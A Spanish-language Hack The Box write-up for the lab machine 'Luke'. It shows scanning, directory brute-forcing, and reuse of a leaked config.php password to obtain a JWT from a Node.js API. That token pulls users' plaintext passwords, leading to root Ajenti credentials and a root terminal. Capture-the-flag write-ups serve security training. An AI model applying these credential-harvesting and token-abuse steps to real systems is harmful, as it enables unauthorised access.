This page looks best with JavaScript enabled

Hack The Box - Luke

 ·  ÔśĽ 6 min read  ·  ÔťŹ´ŞĆ sckull

Luke es una maquina de HackTheBox aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Nombre Luke
OS FreeBSD
Puntos 30
Dificultad Media
IP 10.10.10.137
Maker H4d3s

MASSCAN & NMAP##

Escaneo de puertos tcp/udp y su servicio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
masscan -p1-65535,U:1-65535 10.10.10.137 --rate=1000 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-28 21:04:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8000/tcp on 10.10.10.137                                  
Discovered open port 3000/tcp on 10.10.10.137
Discovered open port 80/tcp on 10.10.10.137                                    
Discovered open port 21/tcp on 10.10.10.137                                    
Discovered open port 22/tcp on 10.10.10.137

nmap -sV -p8000,3000,80,21,22 10.10.10.137 -o nmap.scan
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-28 16:28 CDT
Nmap scan report for 10.10.10.137
Host is up (1.2s latency).

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3+ (ext.1)
22/tcp   open  ssh?
80/tcp   open  http     Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
3000/tcp open  http     Node.js Express framework
8000/tcp open  http-alt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.70%I=7%D=5/28%Time=5CEDA82A%P=x86_64-pc-linux-gnu%r(He
SF:lp,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nCo
SF:ntent-length:\x200\r\n\r\n")%r(SSLSessionReq,42,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\nConnection:\x20close\r\nContent-length:\x200\r\n\r\n")%
SF:r(LDAPSearchReq,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
SF:20close\r\nContent-length:\x200\r\n\r\n")%r(SIPOptions,42,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-length:\x200\
SF:r\n\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.94 seconds

FTP

Ingresamos al servicio de FTP con las credenciales tipicas de anonymous y encontramos un archivo, for_Chihiro.txt.

image

for_Chihiro.txt

1
2
3
4
5
6
7
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of                         
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !                               

Derry

image

HTTP - Puerto 80

image

GOBUSTER - Puerto 80

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.137/ -np -t 15 -x php,html,txt                           
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.137/
[+] Threads      : 15
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : txt,php,html
[+] Timeout      : 10s
=====================================================
2019/05/28 17:39:33 Starting gobuster
=====================================================
/cgi-bin/.html (Status: 403)
/config.php (Status: 200)
/css (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/LICENSE (Status: 200)
/login.php (Status: 200)
/management (Status: 301)
/member (Status: 301)
/vendor (Status: 301)
=====================================================
2019/05/28 17:46:34 Finished
=====================================================

/config.php

image

1
2
3
4
5
$dbHost = 'localhost'; 
$dbUsername = 'root'; 
$dbPassword = 'Zk6heYCyv6ZE9Xcg'; 
$db = "login"; 
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error); 

/management

image

/login.php

image

PUERTO 8000

En el puerto 8000 encontramos un panel de logeo para la plataforma Ajenti.
image

En este punto utilizamos la contrase├▒a y usuario que encontramos en config.php en los diferentes paneles de logeo pero no tuvimos acceso en ninguno de ellos con las credenciales.

GOBUSTER - Puerto 3000

Solo encontramos directorios para solicitudes de nodejs o json.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.137:3000/ -np -t 15 -x php,html,txt,js
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.137:3000/
[+] Threads      : 15
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,txt,js,php
[+] Timeout      : 10s
=====================================================
2019/05/28 17:58:23 Starting gobuster
=====================================================
/login (Status: 200)
/Login (Status: 200)
/users (Status: 200)
=====================================================
2019/05/28 18:05:20 Finished
=====================================================

Realizamos un escaneo de directorios con DIRBUSTER y obtuvimos dos “directorios” m├ís en /users.

1
2
3
4
/users
/users/Admin
/users/admin
/users/ADMiN

Al visitar /login y /Login nos muestra el siguiente mensaje:

1
"please auth"

Al visitar /users:

1
{"success":false,"message":"Auth token is not supplied"}

Realizamos una busqueda de los mensajes que nos mostraba la pagina web al visitar cada uno de los “directorios”, encontramos una pagina que habal sobre tokens.

INFO: Token Authentication - Nodejs

Para obtener nuestro token utilizamos el siguiente request con curl, a├▒adimos la contrase├▒a que encontramos en la pagina config.php, usamos el usuario admin para el request.

1
curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}'   http://10.10.10.137:3000/login

El resultado del request, obtuvimos nuestro token de autenticacion.

1
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MDg5OTQ4LCJleHAiOjE1NTkxNzYzNDh9.vNBalNKwq3ML0MOlw-3OYGFlIUwuyjOE6kCLFB5paW4"}

Utilizamos el token de autenticacion para poder acceder a los usuarios dentro del “directorio” /users.

1
2
3
curl -X GET \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MDg5OTQ4LCJleHAiOjE1NTkxNzYzNDh9.vNBalNKwq3ML0MOlw-3OYGFlIUwuyjOE6kCLFB5paW4' \
  http://10.10.10.137:3000/users

El resultado del request, obtuvimos algunos nombres con su respectivo ID, Nombre y Rol que tiene cada uno de ellos.

1
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

Users:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
[
   {
      "ID":"1",
      "name":"Admin",
      "Role":"Superuser"
   },
   {
      "ID":"2",
      "name":"Derry",
      "Role":"Web Admin"
   },
   {
      "ID":"3",
      "name":"Yuri",
      "Role":"Beta Tester"
   },
   {
      "ID":"4",
      "name":"Dory",
      "Role":"Supporter"
   }
]

Visitamos de igual forma la siguiente ruta con el token /users/Admin y obtuvimos la contrase├▒a del usuario admin.

Request:

1
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MDg5OTQ4LCJleHAiOjE1NTkxNzYzNDh9.vNBalNKwq3ML0MOlw-3OYGFlIUwuyjOE6kCLFB5paW4' http://10.10.10.137:3000/users/admin/

Respuesta:

1
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}

Utilizamos el mismo request cambiamos /admin/ por la lista de usuarios que encontramos para obtener las contrase├▒as de los mismos.

User-Pass:

1
2
3
4
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
{"name":"Yuri","password":"bet@tester87"}
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}

Utilizamos las Credenciales en los distintos paneles que encontramos, en el caso de las credenciales de Derry funcionaron en el panel de /management en el puerto 80 y nos muestra:

Pagina principal

image

config.json

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
{
    "users": {
        "root": {
            "configs": {
                "ajenti.plugins.notepad.notepad.Notepad": "{\"bookmarks\": [], \"root\": \"/\"}", 
                "ajenti.plugins.terminal.main.Terminals": "{\"shell\": \"sh -c $SHELL || sh\"}", 
                "ajenti.plugins.elements.ipmap.ElementsIPMapper": "{\"users\": {}}", 
                "ajenti.plugins.munin.client.MuninClient": "{\"username\": \"username\", \"prefix\": \"http://localhost:8080/munin\", \"password\": \"123\"}", 
                "ajenti.plugins.dashboard.dash.Dash": "{\"widgets\": [{\"index\": 0, \"config\": null, \"container\": \"1\", \"class\": \"ajenti.plugins.sensors.memory.MemoryWidget\"}, {\"index\": 1, \"config\": null, \"container\": \"1\", \"class\": \"ajenti.plugins.sensors.memory.SwapWidget\"}, {\"index\": 2, \"config\": null, \"container\": \"1\", \"class\": \"ajenti.plugins.dashboard.welcome.WelcomeWidget\"}, {\"index\": 0, \"config\": null, \"container\": \"0\", \"class\": \"ajenti.plugins.sensors.uptime.UptimeWidget\"}, {\"index\": 1, \"config\": null, \"container\": \"0\", \"class\": \"ajenti.plugins.power.power.PowerWidget\"}, {\"index\": 2, \"config\": null, \"container\": \"0\", \"class\": \"ajenti.plugins.sensors.cpu.CPUWidget\"}]}", 
                "ajenti.plugins.elements.shaper.main.Shaper": "{\"rules\": []}", 
                "ajenti.plugins.ajenti_org.main.AjentiOrgReporter": "{\"key\": null}", 
                "ajenti.plugins.logs.main.Logs": "{\"root\": \"/var/log\"}", 
                "ajenti.plugins.mysql.api.MySQLDB": "{\"password\": \"\", \"user\": \"root\", \"hostname\": \"localhost\"}", 
                "ajenti.plugins.fm.fm.FileManager": "{\"root\": \"/\"}", 
                "ajenti.plugins.tasks.manager.TaskManager": "{\"task_definitions\": []}", 
                "ajenti.users.UserManager": "{\"sync-provider\": \"\"}", 
                "ajenti.usersync.adsync.ActiveDirectorySyncProvider": "{\"domain\": \"DOMAIN\", \"password\": \"\", \"user\": \"Administrator\", \"base\": \"cn=Users,dc=DOMAIN\", \"address\": \"localhost\"}", 
                "ajenti.plugins.elements.usermgr.ElementsUserManager": "{\"groups\": []}", 
                "ajenti.plugins.elements.projects.main.ElementsProjectManager": "{\"projects\": \"KGxwMQou\\n\"}"
            }, 
            "password": "KpMasng6S5EtTy9Z", 
            "permissions": []
        }
    }, 
    "language": "", 
    "bind": {
        "host": "0.0.0.0", 
        "port": 8000
    }, 
    "enable_feedback": true, 
    "ssl": {
        "enable": false, 
        "certificate_path": ""
    }, 
    "authentication": true, 
    "installation_id": 12354
}

config.php

1
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error); 

login.php

image

Nos enfocamos en el archivo config.json el cual contiene configuracion del mismo usuario root, contrase├▒a, y algunas otras configuraciones, una de las cuales nos muestra el host y puerto. Las credenciales:

1
2
user: root
password: KpMasng6S5EtTy9Z

Utilizamos las credenciales en el puerto 8000 y pudimos logearnos a la plataforma Ajenti.

image

SHELL - USER/ROOT

Utilizamos la opcion de TERMINAL que nos ofrece Ajenti y obtenemos una shell como usuario root, y las banderas user.txt/root.txt.

image

SHELL

image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

HTB: Luke